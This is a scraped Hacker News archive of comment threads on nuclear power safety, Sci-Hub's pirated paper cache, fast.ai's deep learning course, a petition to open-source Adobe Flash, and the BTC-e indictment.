But similar (if not as outrageous) lies have also been said about accidents in the west. The official story about three mile island for example is that it caused no deaths, yet studies find drastic increases of all kinds of cancers in the affected area. See, for example, https://www.counterpunch.org/2015/03/27/cancer-and-infant-mo...

I usually believe that we should be guided by science and data in our public decisions, but the data surrounding nuclear is so distorted by governments that it is just not to be trusted. And now that we have truly safe alternatives like solar and wind, we can finally put that nightmare behind us.

nnfy 19 hours ago 0 replies      
People are using Fukushima to rationalize their fear of nuclear, just like we did after Three Mile Island and and Chernobyl. As someone else confirmed by posting [1], the magnitude 9.0 earthquake and 15 meter tsunami have not happened for at least 100 years. We can tear the plant down in hindsight, but it was designed to withstand probable events, just like any safety standards. It may not be pleasant to speak of human life in this manner, but there is always a cost/risk balance in any human endeavor, and this failure does not necessarily indicate recklessness.


CodeWriter23 20 hours ago 0 replies      
Bullshit. Any energy source where we do not have the technology to clean up the worst case scenario is not the "safest".
dijit 20 hours ago 0 replies      
As a person who actually likes nuclear energy:

The issue I have with Nuclear is that we have not managed to fix the waste issue, and nobody seems to want to talk about it.

I'm not a huge fan of "salting the earth" for 10,000 years.

And when you say "it's safe", you're inherently ignoring that you basically have this toxic waste that is too costly to shoot into space and too dangerous to keep anywhere on earth for 10,000 years where it wont eventually harm the ecosystem.

dsfyu404ed 21 hours ago 0 replies      
I find it amusing that HN is so divided on this issue yet quite unanimous distaste for how the middle east treats people and how the far east treats the environment.

Nuclear power will look a lot prettier when it's competing on price with socially and environmentally ethical solar cells and fossil fuels.

pinaceae 22 hours ago 0 replies      
Funny humans care about their children.

Nothing is scarier than birth-defects. Radiation causes very visible birth defects.

Hence people are very, very scared of radiation. And rightly so.

A windpark will not cause disfigured babies. Hence wind is better.

And: Nuclear is the most expensive energy source, by FAR. safety, waste, clean-up - super, super expensive. dismantle a wind park and it is gone, poof. dismantle a reactor and now you have a new problem.

Also very hard to weaponize wind or solar. Blow up a wind park and well, the wind park is gone. Steal a rotor and now you have a rotor.

etc etc etc.

What is sooo hard to understand about this?

abritinthebay 23 hours ago 1 reply      
This has been known for a long time in informed circles.

The problems with nuclear are waste and that we use vastly outdated designs and fuel sources.

Nuclear is not perfect, but we should not buy into a perfection fallacy when looking to get away from fossil fuels.

Solar is a better long term bet but a good progressive nuclear strategy that added a handful of small modern reactors could be massively complementary to it.

melling 23 hours ago 1 reply      
Strange, there have been lots of discussions about nuclear on HN and a lot of people here don't like it.

e.g. https://news.ycombinator.com/item?id=13234463

cratermoon 22 hours ago 0 replies      
Two words: Hanford Site
ebbv 22 hours ago 1 reply      
padseeker 22 hours ago 9 replies      
tinco 22 hours ago 0 replies      
All the energy sources in this article except for nuclear are horrible for our environment and for our health. The important question is what do we replace them with. And if that is the important question, what good is this article if it shows only one solution, explicitly not comparing it with the other solutions?
Sci-Hubs cache of pirated papers is so big, subscription journals are doomed sciencemag.org
628 points by happy-go-lucky  4 days ago   236 comments top 30
TeMPOraL 4 days ago 18 replies      
I'm very happy to see SciHub going strong - for all the obvious reasons. Now let's just hope they back up to IPFS (if they do, I'll happily pin some of it).

I want to go off a tangent here, though. Now that open access (whether arXiv or SciHub style) is becoming the norm, I wonder what can be done to improve the format of scientific papers? Like e.g. making them more like this:


instead of regular PDFs?

welder 4 days ago 1 reply      
Good riddance, limiting access to scientific articles is a detriment to the advancement of humanity.
fsloth 4 days ago 2 replies      
Basically, the publishers asked for this. Denying open access to old papers from humanitys point of view is wastefull. The planet is full of hungry minds. Who knows where the next Ramanujan comes from and which discipline he or she chooses but given the non existent transaction cost of reading an old paper it would be beyond silly if they could not do it for free.
philipkglass 4 days ago 3 replies      
I had quite a bit of exposure to pirate journal archives before sci-hub arrived. A couple of easy improvements that I saw with past pirate libraries, that it'd be nice to have on sci-hub:

- Strip download watermarks ("Downloaded by Wisconsin State University xxx.xxx.xxx.xxx on January 12, 2017 13:45:12"). Many times, journals published by the same publisher do the watermarking similarly so you need write just one pdftk (or other PDF manipulation software) script for every journal under their banner. At worst, it's a one-script-per journal effort.

- PDF optimization. A lot of publishers produce un-optimized PDFs that could be 25% (or more) smaller with a completely lossless space optimization pass. This should save storage/network costs for access to individual papers and, more importantly, reduce the burden for bulk mirrors.

(I'd contribute the scripted passes myself if I had contacts within sci-hub.)

headcanon 4 days ago 5 replies      
The change won't be immediate though. I don't think universities, which are journals' bread and butter, are going to stop their subscriptions anytime soon. Stopping a journal subscription because everyone is using sci-hub anyway (even if they researchers really are on an individual basis) might open the door for copyright suits against the universities, which would undoubtably be more expensive than just keeping the subs going, especially since its just a line item in an accountant's book. I'm sure it will happen eventually, but journals might have enough time for some to pivot to some more nuanced business model before they go bust.
icelancer 4 days ago 0 replies      
Alexandra Elbakyan's work is one of the most positive and important things to happen in the last 3 decades in the field of science, which has been gradually losing its luster due to the bastardization and devaluation of the field by politicians and salespeople using it like hucksters.

Elbakyan's work has inspired me to only publish my work in jornals that embrace open access and open data. I'll be damned if I am a slave to impact factor and other haughty metrics.

dekhn 4 days ago 3 replies      
The origin of the web was to disseminate scientific knowledge. The guardians of that knowledge- the journal publishers- have absolutely failed to make a viable business model out of this, while many companies who adopted the web made billions.

While I do not use Sci-Hub, I think that users who use it are doing so morally and ethically (in the sense of conscientious objection). i hope they are also willing to pay penalties if they are found to be violating copyright (this is generally considered a requirement for intential protest).

sixdimensional 4 days ago 2 replies      
So, fundamental question here - if scientific articles (or anything that can be copy protected, etc.) can be released online in this manner to "free the knowledge", and yet, given such free access, there are still people that will pay for a subscription to access the same scientific articles, wouldn't that be the best solution?

I see people commenting that just because of this release, universities won't cancel their subscriptions to the journals. Well, that would be great - let them keep paying, while the content also gets out for free.

This is like the trend where you can pay what you want for stuff, or nothing. I wonder if that model would apply to scientific research - pay what you want for the paper, or nothing - but if you want to support that research.. hopefully people would still pay.

Just thinking out loud... probably already been thought of or wouldn't work (or I'm just self-defeatist). :)

drewda 4 days ago 0 replies      
I'm all for Sci-Hub disrupting the dominance of RELX Group (a.k.a. Elsevier) and other for-profit publishers that make such a big profit off the backs of researchers (who write and edit for free) and grant-making organizations (who fund those researchers).

But it's unfortunate that Sci-Hub is also disrupting non-profit scholarly associations that cover their own budgets through journal subscriptions. In these cases, the fact that libraries and readers have to pay for access to an article is somewhat balanced out by the fact that those fees are going to pay for staff, conferences, and the other worthwhile activities of the non-profit associations.

koolba 4 days ago 3 replies      
So is Sci-Hub like Oink[1] for scientific papers?

EDIT: For those not familiar, Oink was a torrenting site but what distinguished it from the tons of other sites was how highly curated it was. High quality audio, proper grouping and genres, and best of all you could request anything that was missing and the community would magically add it.

[1]: https://en.wikipedia.org/wiki/Oink%27s_Pink_Palace

CorvusCrypto 4 days ago 2 replies      
How does this doom subscription journals? I mean it would be nice but realistically it just means they move to exploit the university subscriptions since the professors can't admit use of illegally obtained copies. They can further exploit the authors since many journals require payment from the author for submission and some journals charge in the hundreds. One might say "just publish to a different journal" but it's not that easy. Because of the heavy reliance on Impact Factor in scientific publishing, it is the journals with those high impact factors that the authors will try to publish to. Regardless of whether or not they are being pirated.

This is sad to say, but in reality I think this isn't going to massively impact things for the publishers. Academia at its core is where the problem lies. Sure paid subscriptions are a big part of things, but it's the stuff most don't realize (the authorship fees and institution sub fees) that give the publishers power.

darawk 4 days ago 0 replies      
The death of for-profit scientific journal companies will be a beautiful thing for the world. It's really rare to see something that is so purely valueless. This industry is sort of unicornlike - they've managed to extract rents in an area where they add literally zero value. It's truly an amazing thing, and it will be even more amazing to watch it die.
sillysaurus3 4 days ago 4 replies      
I was surprised that it's still considered rude to link to sci-hub: https://news.ycombinator.com/item?id=14714577#14715252

Anyone know if this is a typical sentiment? I'm just curious if it's true that many researchers are offended by this movement, and what the reasons are.

I firmly believe that there are always two sides to any topic, so we should explore the flipside. What are some arguments against blatantly opening up access to paywalled articles?

biomcgary 4 days ago 0 replies      
I've met the author of the study, Daniel Himmelstein, who is quite passionate about making information free. Projects in his github account (https://github.com/dhimmel) tend to use a CC0 license. Some of his work involves aggregation of data (e.g., https://github.com/dhimmel/hetionet) that is encumbered and he has put a lot of effort into making it as free as possible. His project carefully documents the license for each data point and he took the time to ask copyright holders that do not provide an explicit license to do so.
return0 4 days ago 0 replies      
The Noah's Pirate Ark that will save all of humanity's knowledge from unreliable publishers.
philipkglass 4 days ago 1 reply      
I don't think that sci-hub is going to kill off institutional journal subscriptions in the developed world. It's similar to how developed-country universities didn't stop buying licensed software and start passing around cracked versions to their faculty and students. Journal revenue isn't going to plummet like CD sales after Napster, because it's not individuals doing most of the purchasing in the first place.

Individuals and institutions in poor countries may well turn to sci-hub. I certainly have. But I would venture that not much of the journals' revenue came from individuals or poor institutions in the first place. I didn't pay to read paywalled papers before sci-hub either; I got them via authors' sites or personal contacts, or just didn't get to read them at all.

return0 4 days ago 0 replies      
The academic world has missed some decades of advancement of communication. In a world where all published science is open for meta-processing, the burden of validating science would shift to search engines. There would be search engines competing with scientific-SEO of course, but in the medium-run this would improve scientific writing, and possibly speed up science in general. In the end there will always be some private actors doing the work of "ranking" scientists. Academics are hanging on to the current peer-review journals precisely because they don't want to give that power to other actors.
pdimitar 3 days ago 0 replies      
I'll be that guy who will gladly eat some downvotes for this apparently unpopular opinion:

"Science" and "subscription" (or any monetary incentive) don't compute in a single sentence. Aren't scientists funded by governments and/or corporations? Why should anyone pay them a royalty above that?

It's a legit question and not trolling, don't mistake my slightly angry tone for degrading please.

turc1656 4 days ago 0 replies      
Looks like Aaron Swartz's vision for the free, collective ownership of mankind's scientific knowledge is well on its way. I wish he were still alive to see Sci-Hub in action.
revelation 4 days ago 1 reply      
Does Sci-Hub actually have all the papers or are they just retrieving them on-demand?

Publishers are tracking mass downloads (see the Aaron Swartz case) so given some of the very obscure papers I've retrieved from Sci-Hub I assume it's unlikely they downloaded them beforehand. My go-to assumption for how it works is that a bunch of people have donated access to their university network access and Sci-Hub is just a load-balancing / cache layer.

filedrawer 4 days ago 0 replies      
I work for a scholarly publisher and I'd be very interested in hearing about whataside from costwould cause you to go to Sci-Hub for a paper?

Is it reading experience? Site performance? Difficulty in navigating publishers' sites?

Are there any good experiences you can point to? I'm really interested in making this better.

bogomipz 4 days ago 1 reply      
Can someone who's familiar with this research paper subscription model that is threatened a la Elsevier explain to me how we got here?

I am curious if at one time did Universities publish these independently and were they more accessible to the public? When did this practice of restricting access to papers via subscriptions begin?

kazinator 4 days ago 0 replies      
They should expand into engineering: I don't see any IEEE or ISO standards in there, for instance.
daveheq 4 days ago 0 replies      
Now if we could get the government version of this...
andrepd 4 days ago 0 replies      
Thanks! That reminds me I should donate to Sci-Hub!
sonium 4 days ago 1 reply      
This will be a catalyst for open-access
joelthelion 4 days ago 0 replies      
If only. I'm convinced they will find a way to shut her down.
vbuwivbiu 4 days ago 0 replies      
and it's better than all of their websites!
agumonkey 4 days ago 0 replies      
Anybody mirrored (or attempted to do so) libgen ?
mcappleton 4 days ago 1 reply      
It's not just the publishing industry that is the problem. It is merely a symptom of the greater malaise in higher education as a whole.

The focus is on degrees, not on true learning. So much of what occurs is in universities is total waste. But people put up with it to get the paper. As long as people keep blindly giving absurd sums of money to get the paper, these expensive publications will last. The answer is for people to wake up and value learning over a diploma. When that happens, then finally issues like this will go away. Heck, as a bunch of people have pointed out, many of these papers aren't even for real learning. They are worded in such a way as to make them sound smart to their peers, but unintelligible to the public.

Deep Learning for Coders Launching Deep Learning Part 2 fast.ai
690 points by jph00  1 day ago   91 comments top 19
metafunctor 1 day ago 5 replies      
Part 1 was great.

However, the first lesson took a bit of stamina to go through. Much of it was introducing basic Unix/AWS/shell/Python things I know intimately and have strong opinions and deeply set ways about. Shell aliases, how to use AWS, what Python distribution to run, running Python from some crazy web tool called notebooks (and not Emacs), etc. felt like I was forced to learn a random selection of randomly flavored tools for no good reason.

Yes, it's a random selection of tools. The good reason to bear them is that you'll learn how to implement state of the art deep learning solutions for a lot of common problems.

So, I ended up viewing the lessons not as "this is how you should do it", but rather as "here's one way to do it". And it does get much easier after internalizing the tools in Lesson 1.

Just something to keep in mind when branding this as "deep learning for coders". Coders have deep opinions about the tools they use :)

phunge 1 day ago 1 reply      
Highly recommended! The first course was the first thing I came across that helped me contextualize the DL field into something that might be relevant for my work. It's a great way to get your hands dirty.

One point of comparison is Cam Davidson Pilon's Bayesian Methods for Hackers, they have a similar vibe: practical applied advice from a field that tilts towards the academic...

ashkat 1 day ago 0 replies      
Thank you so much for this, for me Deep learning Part 1 was a top notch course that really helped me learn by actually doing things in variety of topics (e.g competing in Kaggle, creating spreadsheets to understand collaborative filtering & embeddings, sentiment analysis using CNN and RNN etc). I found the top down approach to very effective in keeping me motivated as I worked my way through the course.It took me 6 months of watching(and rewatching) the videos and working on problems to get comfortable.

I have done a few MOOCs: Andrew Ng's machine learning, Coursera ML specialisation, edx Analytics Edge and all of them were good learning experience but fast ai's deep learning part 1 really stood out.

For me, the combination of Deep Learning Book + Fast ai MOOC + CS231n (youtube videos & assignments) cover almost everything I want to learn about the subject.

@jph00, I'm half way through neural style transfer and I am loving it.

jph00 1 day ago 0 replies      
I somehow forgot to mention in the post - we're teaching a totally updated part 1 course (keras 2, python 3.6, Tensorflow 1.3, recent deep learning research results) starting end of October in San Francisco. Detail here: https://www.usfca.edu/data-institute/certificates/deep-learn...

I'll go edit the post with this info now - but figured I'd add a comment here for those that have already read it.

colmvp 1 day ago 5 replies      
My feelings on Part 1:

I felt like the setup of the first part was at time a little frustrating, since I started it during a time when Keras had switched to a newer version which wasn't compatible some of the utility code that was written. Add this to the newbie factor to notebooks, and it was a pretty rough first week or so to setup and get actual learning done. It took me a bit of time to realize notebooks were more like repeatable trains of thoughts than well-written production code.

The other thing is that some of the supplementary material was really long and at times made me feel like, why take this course instead of just going through a course mentioned in supplementary material (e.g. CS231n wrt CNN's)? I think I ended up spending hundreds of hours reading/watching/practicing CNN's by reading papers, watching Karpathy's 231n videos, and doing a couple tutorials from data scientists who elaborated on a specific problem they were solving. I guess at times when watching Part 1's videos and doing the notebooks, I didn't feel like I was 'getting it' as much or as fast as when I was getting the information from other means.

While the forum discussions can be helpful, it was also wadding through a ton of unstructured content. And the service they used for the forums hotmapped the find shortcut to their own built-in search, which was a little annoying. I don't know a great solution to having more structured data, but perhaps adding some of questions that were answered to the lesson's Wikipedia. Or maybe splitting the technical issues from the high level concepts.

Lastly, I think it was either HN or /r/MachineLearning but someone had suggested a book regarding Machine Learning and hands-on Tensorflow usage which I picked up, and I felt like my pace of learning really sped up afterwards. I think part of it was Tensorflow has a lot more written about it so when you encounter an odd problem, chances are someone else has something to say about it.

All criticisms aside, I think I'll try going through Part 1 a second time around prior to going through Part 2.

DrNuke 1 day ago 0 replies      
The n00best path to data science and machine learning state of the art is now complete, no excuses! 2015: Andrew Ng's Coursera MOOC; 2016: Kaggle competitions with xgboost and ensembles; 2017: deep learning code-oriented courses with fast.ai and GPU hardware for the masses. Thanks, very lucky to witness and try this.
natch 1 day ago 3 replies      
Afraid I may have missed the window on the chance to provide feedback to jph00 via this channel, but here goes.

Am watching Part 1 now and only two sessions in, but there are some tweaks I would love to see. First the positive: I really appreciate the approach of hands-on and teaching theory only as it's needed and in conjunction with applied work.

Would love to see a tiny bit of time spent on setting up tools for people who already have good Nvidia GPU systems. My Ubuntu system has python (2.7) and python 3.5 both installed, but no Anaconda... I don't know if I'm going to totally screw up my system if I install Anaconda over those working existing python installations, for example.

It would be great to hear the questions. I can barely hear a faint voice in the background as Rachel reads the questions (presumably from online) but it seems like it would be a very easy tweak to have her closer to a microphone. Maybe this happens in later sessions and I just haven't gotten to them yet.

It would be great if so many things weren't abbreviated in the code variable and function names. Examples: nb for notebook, t for ?, a for array(?), U, s, and Vh for ?, ims (?), interp (interpretation or interpreter or interpolation?), sp, v, r, f, k, trn (train or turn or something else?), pred (predicate or prediction?), vec_numba (?)... the list goes on. Yes if I knew the field these might be obvious but for some of them I'm still learning. "np" I understand since that's standard practice and you explained it. It would be really really easy to just spell out words in the code, as well as being a good practice in general imho, and, since you are trying to teach stuff, it would seem appropriate.

Those nitpicks aside I'm really stoked about the course and really appreciate everything you have been putting into it!

daedalus13 1 day ago 1 reply      
jph00, I found the first course hard to follow because of some broken links and poorly organized content. One link that was necessary kept taking me to a password protected page. This is about a month ago.

It would be good if someone could revisit part.1 and make those minor editorial fixes if they haven't already done so.

I might be being too precious about my time, but I also found the first video about your teaching philosophy somewhat gratuitous; I wish I hadn't watched it.

alexcnwy 1 day ago 0 replies      
Honestly can't recommend this course highly enough.

It's definitely not perfect - the notebooks are not commented and the material does tend to jump around a bit - but what it does do, it does extremely well.

This course will teach you how to actually build deep learning systems and build the kinds of things you read about PhDs doing...

mcintyre1994 1 day ago 1 reply      
I've been looking to do part 1, so this is really cool - looking forward to this too! On http://course.fast.ai/part2.html the thumbnail for lesson 8 has specs for building a PC, with advice to use pcpartpicker. For part 1 I liked the idea of using AWS and only paying for a few hours, does part 2 have a hard requirement of a >$100s investment in hardware?
BrianMingus 1 day ago 1 reply      
Latently (SUS17) also provides a more self-directed path to learning deep learning focused exclusively on implementing research papers and conducting original research: https://github.com/Latently/DeepLearningCertificate
edshiro 1 day ago 0 replies      
This is exciting! I went through Part 1 a few weeks ago (probably have to cover embeddings and RNNs again...) and felt it was totally worth it.

Part 2 seems equally strong in content (if not stronger). It's a beautiful time to be n00b in deep learning & AI, and learn via material like these. No excuses. Knowledge is power.

Omnipresent 1 day ago 1 reply      
For folks who've gone through part 1 and 2. Do you think the course provides enough material to tackle tasks like deep learning ocr [1] or custom object detection in images?

[1]: https://blogs.dropbox.com/tech/2017/04/creating-a-modern-ocr...

cs702 1 day ago 0 replies      
Based on the feedback I'm reading here about Part 1, I'm going to start recommending these courses to non-academic friends who have expressed interest in learning more about Deep Learning.

THANK YOU for doing this.

bitL 1 day ago 0 replies      
Wonderful! You picked a really nice selection! Can't wait to do them all! Thank you!
cakedoggie 1 day ago 1 reply      
They don't even have a link to part 1 at the start of the article??
mikden 1 day ago 0 replies      
Looking forward to part 2 Jeremy!Part 1 was nothing short of excellent
Tsagadai 1 day ago 0 replies      
jph00, I would just like to thank you for the first course and now the second course. I've thoroughly enjoyed both and they have taught me a lot.
throwaway12017 1 day ago 1 reply      
What is the goal of these trainings? To get a taste so you understand the conversation? There is a lot more to data science than neural networks, and I'm skeptical that teaching one family of models will create a set of implementers that don't compare and contrast solutions.
Petition to open source Flash github.com
558 points by pkstn  5 days ago   240 comments top 49
notacoward 5 days ago 26 replies      
No no no no NO. It's time to get rid of Flash. Open-sourcing will make it live forever.

Flash has very little to offer that is not at this point duplicated (or improved upon) by others. It's also woefully insecure. "Many eyes make all bugs shallow" will only work for the most trivial bugs in the most common code paths. Plenty of vulnerabilities will remain. In open source, they'll be even easier for attackers to find and exploit. If you want something open-source and (mostly) Flash compatible, follow nkkollaw's suggestion: support one of the already-open-source alternatives.

aylmao 5 days ago 0 replies      
I learned to program in ActionScript 2 on Macromedia Flash MX back in high-school. In spite of all the (deserved) hate Flash gets, we got to give it credit too.

- It was a response to the stagnant IE-dominated web that allowed people to experiment and create incredibly rich content that is still hard to replicate.

- It's editor was amazing for introductory programming. It was as easy and intuitive to use as any vector-graphics editor, but you could get really complex on your programming too. It was very visual, very graphical, which helped.

- It was great for animation. I really can't think of anything that compares. There's lots of animation software out there but most are targeted to video. There's lots of libraries for animating Canvas/SVG, but they don't have interfaces/editors for non-programmers. Flash was an amazing middle-ground; a great creative AND technical tool IMO.

- ActionScript was nice; it wasn't daunting, it had types to help you, but they didn't clutter the syntax. If I recall correctly, the tooling wasn't too shabby either, with good auto-complete and suggestions as you type.

It's thus no wonder it caught on like wildfire and there was so much content for it. It was a good option for technical projects and creative ones, beginners and experts. I definitely don't want to see Flash making a comeback on web, but I wouldn't mind seeing it in standalone applications (assuming security doesn't become an issue), and I could see its value on education, granted, with the right editors and tools.

jarym 5 days ago 5 replies      
So much hate for Flash. Yes it has regular security holes, is CPU hungry and a lot of people used it to create some mightily annoying things....

But Flash was a gift from the gods back in the early days of IE and most people forget that. If you wanted to make some HTML look nice you had little more than the dreaded 'blink' tag to work with.

If it weren't for Flash I doubt we'd have anywhere near as advanced CSS, SVG, Canvas and HTML5 bells and whistles that designers can actually use now.

I doubt Adobe will open source it though. They probably know there's a whole heap of other security issues in it that'll get found and exploited as soon as they release it. Your average user won't be able to patch fast enough!

nkkollaw 5 days ago 6 replies      
Why not contribute to well-established open source Flash players?



ransom1538 5 days ago 2 replies      
Again. From my game dev days, the people that really lose (over and over) are the artists. Millions of hours have been sunk into laying out vector graphics with the Flash IDE. Code I understand should eventually be tossed away, but, not art. I guess staring at millions of beautiful vector timelined illustrations changed my opinion - but it is art to me. And like books, I think its a sin to toss. I hope the artists convert their .fla files over and save what they can.
simion314 5 days ago 3 replies      
I can't understand why people are against open sourcing some proprietary code, why would it affect you? If you hate Flash that much you will have the opportunity to see the source code and confirm that is bad. All the open source reimplementation are incomplete, so with the opening up of Flash the open source ones could have a look (if license allows) and finish the reimplementation.
nradov 5 days ago 3 replies      
Chances are that Flash contains licensed third-party IP and thus Adobe couldn't unilaterally open source it even if they wanted to.
mstade 5 days ago 2 replies      
FWIW I posted[1] in the Flash EOL thread the other day that an Adobe employee told me years ago that licensing issues were the main hindrance to open sourcing the Flash player. (Another HN user who said they used to work for Adobe seems to back this up.) A lot of technology in the player was licensed and difficult to remove/refactor such that the player code could realistically be opened up, and there was little business incentive to invest resources into it. I'd imagine the incentives are even less now.

[1]: https://news.ycombinator.com/item?id=14850791

fenomas 5 days ago 0 replies      
I worked at Adobe near the Flash team back in the day, and the PMs I knew would have absolutely loved to open-source the Player. The problem isn't willingness, it's third-party code, of which there is apparently a lot.

If there was just a button to be pressed, Adobe would have pressed it circa 2010. But at this point, I think open-sourcing Flash Player is the kind of thing where the project to figure out what all would need to be done would cost more than Adobe would want to invest, never mind actually doing the necessary work (both engineering and legal).

gamedna 5 days ago 2 replies      
Flash has generated a tremendous amount of assets that will be lost. Preserving them for historical reasons is extremely important but i am far less interested in preserving the technology than preserving the idea or creation itself. I would love to see an effort around conversion or transcoding flash assets to other technologies. For example, flash movies being rendered to an open standard or flash games being automatically converted to javascript/html5. The content creator deserve to have their legacy recorded and maintained but this is not the solution. (granted it may be a solution for other use cases, but i am not sure what those are)
Anatidae 5 days ago 1 reply      
There could be an issue of opening up even more security issues for people with Flash still installed. That, in turn, will likely lead to an all out campaign to remove Flash from everything possible (maybe not a bad thing at this point).

But, honestly - Flash as a platform hasn't advanced much in quite a while. What it once offered - rich multimedia runtime engine across platforms - is either available in the browser directly or can be attained through even more rich engines such as Unity3D.

rnhmjoj 5 days ago 0 replies      
As long as it stays away from a browser it's perfectly fine.

I am already using gnash to run flash games and a feature complete open source implementation would be very welcome.

JohnTHaller 5 days ago 1 reply      
No, you don't need your silly flash player to play free games in your web browser or offer to users at a payment plan and method of your choosing. We've got this great app store for you to use that only costs $100 a year to submit apps to and we keep 30% of all the money you make on your game.
pan69 5 days ago 1 reply      

 Notice: The idea is not to save Flash Player, but to open source Flash!
What exactly is being referred to here? The Flash authoring tool I assume? As in, the application that you install on your desktop and use to create Flash animations with?

I think a better description of the purpose of this petition might be a good idea. A lot of people conflate Flash and Flash Player.

Popster 1 day ago 0 replies      
I'm all for a Flash emulator that emulates the functions that Flash currently has, but do not start an open source project that adds more functions and security issues and whatnot. Any further development must be stopped.
Animats 5 days ago 0 replies      
Just for historical reasons, it's good to have the source out there. Fifty or a hundred years from now, someone may want very badly to recover some old .swf file.
midnitewarrior 5 days ago 0 replies      
I don't think anybody wants to see what's actually under the covers. Also, I'm pretty sure they've licensed patents from other participants, so it's not very likely they would bother trying to figure out all those details.

Future history does need a copy they can use in the future to look at web sites of the past though. Content that relies on proprietary technology will be lost in the annals of history.

scj 5 days ago 0 replies      
Open sourcing code allows a new vector for finding vulnerabilities. Just because the software reaches its EOL doesn't mean it is removed from every computer.

I believe that open sourcing Flash should be done for the sake of software preservation. But I would recommend 2025 (end of life for Windows 10 and IE11) as the earliest release date.

BatFastard 5 days ago 0 replies      
You have to understand the source of the problem. The browsers do NOT want to support this level of plug-in since it is less secure. That is why the Unity plug-in went away, that is why ALL plugs ins are going away. Flash is still alive as AIR in mobile and desktop. But it is DEAD in browsers.
mirekrusin 5 days ago 1 reply      
"So Adobe, you're killing Flash now. That's fine since you apparently can't fix it."

Seriously, why start with sentences like that if you really care about it being open-sourced?

madshiva 5 days ago 0 replies      
If you want save flash, just install an virtual machine with WinXP and stay in the past. Too much website still use flash.. come on they have been warned so many times, flash must die.
joe_momma 5 days ago 0 replies      
There should just be a Flash only browser with an HTML5 blocker muhahaha.
unsignedint 5 days ago 0 replies      
Aren't more of recent application for Flash is to deliver DRMed video while rest moving to something else like HTML5. If this is the case opensource Flash won't really help...
Brajeshwar 5 days ago 0 replies      
A bunch of us suggested this to Macromedia around 2005. Unfortunately, it never became a popular topic. Adobe took it over and well; turtles all the way down.
pkstn 5 days ago 0 replies      
The idea is not to preserve Flash player as is, but to open source Flash spec to make it possible to archive all the good stuff out there!
flashplayer_exe 5 days ago 0 replies      
Browser vendors are already disabling flash by default.There is no need to "kill" anything. Even if it were opensourced today it will still meet the same fate. The only people who care about open sourcing are those who want a standalone flash player for archival purposes.

Gnash works pretty well with non AS3 noninteractive movies and looping swfs. Most games are still broken though.

zwetan 5 days ago 0 replies      
what about petitioning Google so they open source Swiffy ?

To me Google Chrome is the one responsible for killing Flash, Adobe is just playing catch up.

jaimex2 5 days ago 0 replies      
Big star from me.

I never understood the hate flash got, sure it was abused by ads but to this date I have never seen the same level of animated and vibrant websites that were around in its peak.

Everything is the same old bootstrapped template now, its pretty boring.

rhabarba 4 days ago 0 replies      
Where can I sign a petition to let Javascript die before 2020?
kahlonel 5 days ago 0 replies      
I would do anything to preserve those white buttons with glowy green borders.
odammit 5 days ago 0 replies      
I would love to see what kind of Simcities are in that source code
adaml2017 5 days ago 0 replies      
yes! great idea. Also quick observation, Flash is so hard to get rid of because it's still a very useful tool. We're lucky to have had it in the 2000's
cgb223 5 days ago 0 replies      
There are a ton of Black Hat hackers who would love to see this petition become real

Shut it down, the internet is massively more secure without flash

prodikl 5 days ago 1 reply      
ActionScript is still loved by the Starling community. I don't really think i'll miss the swf format, though
yuhong 5 days ago 0 replies      
This will probably take years of course. Hopefully the H.264 patents will expire at least not long afterwards.
dhosek 5 days ago 1 reply      
How about a petition to have Adobe put into all versions of Flash going forward code to disable the flash player on the EOL date so that the danger of security vulnerabilities from the damn thing will be greatly reduced.
xilni 5 days ago 3 replies      
Dear god no, please just let it die, I don't care about Badger, Badger, snake or Flash hentai flash game nostalgia that much.
dim13 5 days ago 0 replies      
Let it go gracefully.
rbanffy 5 days ago 0 replies      
Please, let it die.
covamalia 5 days ago 0 replies      
Just let it die!
c4ncri 5 days ago 1 reply      
Let flash die. We don't need it. We got HTML5.
imagetic 5 days ago 0 replies      
Let it die.
ram_rar 5 days ago 0 replies      
Its already open sourced. Its called HTML5!
bricss 5 days ago 0 replies      
Burn it to hell
sureste 5 days ago 0 replies      
I support this. In 20 years when no one is using it anymore and the source code is released for academic purposes.
CrankyBear 5 days ago 1 reply      
Really? Really!? All the years we've suffered with this, this insecure "Thing* and you want to give it eternal life in open source? Not just no, but hell no. You want video? Use HTML 5's Theora, H264, or WebM.
jayflux 5 days ago 1 reply      
Even if this did happen I doubt browsers would support it (as already mentioned)If nostalgia is the problem, it would be far less effort to recompile those games into html5
omarforgotpwd 5 days ago 0 replies      
Yikes. How about a petition to burn it with fire? Petition to erase all mention of flash from history books?
mtgx 5 days ago 8 replies      
Isn't Flash player's code super-messy by now? (a hint towards that could be all the vulnerabilities found for it every week). Open sourcing it would have to dramatically improve the code quality and in a relatively short period of time (2 years max), otherwise browser vendors would never go along with it (nor should they).

Sounds like a daunting task, especially if no big organization/leader takes up the task of cleaning it up, the way OpenBSD did with LibreSSL.

BTC-e and its founder charged in 21-count indictment over hack of Mt. Gox justice.gov
457 points by ryanlol  5 days ago   243 comments top 21
openmosix 5 days ago 13 replies      
The question for me is: why US? He is a Russian citizen, the company is based in Bulgaria, servers in Russia, legal HQ in Cyprus and all the services operated from Seychelles - arrested in Greece. The MtGox hack affected a Japanese company. I'm not debating the nature of the crimes, etc - I am just wondering, when does it become a US case?

I can get the "there were US customers" - but why not Europe? Or Japan? Or Russia? Or Australia? I'm sure BTC-e had customers from all over the world (and money laundry is pretty much a crime everywhere).

So, when does it become "you have broken the US law and you are under arrest"?. Does it work the other way around too? If you start a gay social network in US, can Russia come in (the first time you are flying in one of the Russia's partners territories) and say "you are breaking Russian gay laws, you are under arrest"?

mrb 5 days ago 3 replies      
BTC-E has been seen by the Bitcoin community as "shady" for years. People have always recommend others to avoid using it. It was rumored to be an easy place to sell stolen Bitcoins. It has always offered strangely convoluted pathways to transfer fiat to financial institutions (see http://bitcoinworldwide.net/how-to-deposit-money-into-btc-e). I'm glad BTC-E finally got taken down. I am not surprised it was involved in illegal activities. One less shady Bitcoin company.

Now the top 12 or so volume-ranked Bitcoin exchanges listed at https://cryptowat.ch are perfectly legitimate trustworthy companies. The ones I'm not sure about are CEX.IO and Luno (not saying they aren't trustworthy, I just don't know them that well) and, well, Bitsquare which as a decentralized exchange is bound to have some shady participants.

lettergram 5 days ago 12 replies      
I still don't understand, the U.S. is charging a Russian with a white collar crime?

The crime was committed outside the U.S., he didn't come to the U.S., the servers weren't in the U.S., Mt.Gox was based out of Japan, and Greek police arrested him.

I've seen this enough to know this is common, but what is going on with this world?

Dolores12 5 days ago 6 replies      
1) Arresting btc-e admin made all US customers to lose their balances on btc-e exchange. I highly doubt btc-e will come back online.

2) If you run online exchanger and have a single US customer, then you have to register your operation in USA. I find it ridiculously stupid.

